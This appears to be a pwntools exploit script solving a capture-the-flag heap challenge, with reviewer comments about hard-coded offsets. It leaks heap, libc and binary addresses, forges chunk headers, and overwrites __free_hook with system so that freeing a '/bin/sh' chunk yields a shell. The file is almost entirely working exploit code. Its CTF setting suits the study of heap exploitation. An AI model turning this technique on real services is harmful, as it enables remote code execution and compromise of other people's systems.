from pwn import *

# Log every byte sent and received on the tube; noisy but useful while developing.
context.log_level = 'debug'
context(arch='amd64', os='linux')

# 1: spawn ./pwn1 locally and use the libc pwntools resolves for it;
# 0: connect to the remote service and load a fixed host libc path instead.
local = 1
elf = ELF('./pwn1')
if local:
    p = process('./pwn1')
    libc = elf.libc
else:
    p = remote('55fca716.gamectf.com', 37009)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')

# NOTE(review): fixed offsets into one particular libc build; only index 2 is
# read later in the script, and nothing verifies that the target's libc matches.
onegadget64 = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
def sl(s):
    """Send *s* followed by a newline on the tube ``p``."""
    return p.sendline(s)


def sd(s):
    """Send *s* on the tube ``p`` exactly as given (no newline)."""
    return p.send(s)


def rc(n):
    """Receive up to *n* bytes from the tube ``p``."""
    return p.recv(n)


def ru(s):
    """Receive from the tube ``p`` until the marker *s* has been seen."""
    return p.recvuntil(s)


def ti():
    """Hand the tube ``p`` over to the user interactively."""
    return p.interactive()
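def debug(addr, PIE=True):
    """Attach gdb to the process ``p`` with a breakpoint at *addr*.

    With ``PIE=True`` *addr* is an offset that is added to the text base,
    which is read from the second line of ``pmap <pid>`` output; with
    ``PIE=False`` *addr* is used as an absolute address.

    Raises IndexError/ValueError if ``pmap`` output is not in the expected
    shape (fewer than two lines, or a first column that is not hex).
    """
    if not PIE:
        gdb.attach(p, "b *{}".format(hex(addr)))
        return
    # p.pid is an int supplied by pwntools, so the shell string cannot be
    # influenced by the target; the pipe is closed once the output is read
    # (the original left the popen handle open).
    with os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)) as pmap_out:
        lines = pmap_out.readlines()
    # Line 0 of pmap is the "pid: command" header; line 1 is the first mapping.
    text_base = int(lines[1], 16)
    gdb.attach(p, 'b *{}'.format(hex(text_base + addr)))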
def bk(addr):
    """Attach gdb to the process ``p`` with a breakpoint at absolute address *addr*."""
    # hex() already returns a str, so no extra str() conversion is needed.
    breakpoint_cmd = "b *" + hex(addr)
    gdb.attach(p, breakpoint_cmd)
def _choose(option):
    """Wait for the menu prompt (its last entry is "4.exit") and send *option*."""
    ru("4.exit")
    sl(option)


def malloc(size, content):
    """Menu option 1: answer the "Length:" prompt with *size* and send *content* raw.

    *content* is sent with sd(), i.e. exactly as given and without a newline.
    """
    _choose('1')
    ru("Length:")
    sl(str(size))
    ru("Content:")
    sd(content)


def free(idx):
    """Menu option 2: answer the "Id:" prompt with *idx*."""
    _choose('2')
    ru("Id:")
    sl(str(idx))


def edit(content):
    """Menu option 3: answer the "Name:" prompt with *content*, sent raw."""
    _choose('3')
    ru("Name:")
    sd(content)
# --- Heap set-up and first address read-back ---------------------------------
# NOTE(review): the allocation sizes, the free() order and the 0x1b0 delta are
# tied to this particular binary and the libc it was built against; nothing in
# the script checks that the running target matches.
malloc(0x100,'aaaaaaaa')
malloc(0x91,'aaaaaaaa')
malloc(0x100,'aaaaaaaa')
malloc(0x100,'aaaaaaaa')
free(0)
free(2)
# After this allocation the service presumably prints the stored content back;
# the 6 bytes following the 'bbbbbbbb' marker are read, zero-padded to 8 and
# decoded as an 8-byte integer (little-endian per context arch).
malloc(0x100,'bbbbbbbb')
ru('bbbbbbbb')
heap = u64(rc(6).ljust(8,'\x00'))-0x1b0
# Same read-back a second time; the 6 bytes are consumed by the following
# statement of the script (libc_base).
malloc(0x100,'bbbbbbbb')
ru('bbbbbbbb')
# --- Address computation from the read-back values ---------------------------
# NOTE(review): 0x3c4b78, 0x202040 and the onegadget64 table are offsets for one
# specific libc build and binary; they are not validated against the target.
libc_base = u64(rc(6).ljust(8,'\x00'))-0x3c4b78
print "heap--->" + hex(heap)
print "libc_base--->" + hex(libc_base)
onegadget = libc_base + onegadget64[2]   # computed but not used anywhere in the visible script
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym["__free_hook"]
fake_chunk = free_hook-0x48
system = libc_base + libc.sym["system"]  # duplicate of the assignment above; same value
# Option '666' is not among the four entries the "4.exit" prompt implies;
# presumably an undocumented menu command whose reply ends in "chunk" — verify.
ru("4.exit")
sl('666')
# int(..., 16) raises ValueError if the reply is not hex digits followed by
# "chunk"; there is no fallback or error message.
base_addr = int(ru("chunk")[:-5],16)-0x202040
print "base_addr-->" + hex(base_addr)
free(3)
free(2)
free(1)
free(0)
# --- Payload construction and final interaction -------------------------------
# NOTE(review): every constant here (0x1c1, 0xc1, 0x202041, 0x3c67f8, 0x43 and
# the filler lengths) is specific to this binary and libc build; none of it is
# checked at runtime, so a mismatch shows up only as a crash or a hang.
py = ''
py += 'a'*0xe0
py += p64(0) + p64(0x1c1)
malloc(0x120,py)
malloc(0xb8,'2222')
malloc(0xb8,'3333')
malloc(0xb8,'/bin/sh\x00')
# Three edits of the name buffer: 0x20 bytes of filler followed by one
# 8-byte little-endian value each.
edit('a'*0x20+p64(base_addr+0x202041))
edit('a'*0x20+p64(libc_base+0x3c67f8))
edit('a'*0x20+p64(free_hook-0x43))
free(2)
free(1)
py = ''
py += 'a'*0xf0
py += p64(0) + p64(0xc1)
py += p64(fake_chunk)
malloc(0x1b0,py)
malloc(0xb8,'6666')
py = ''
py += '\x00'*0x38 + p64(system)
malloc(0xb8,py)
free(3)
# Hand the tube over to the user; the script does not check the outcome.
p.interactive()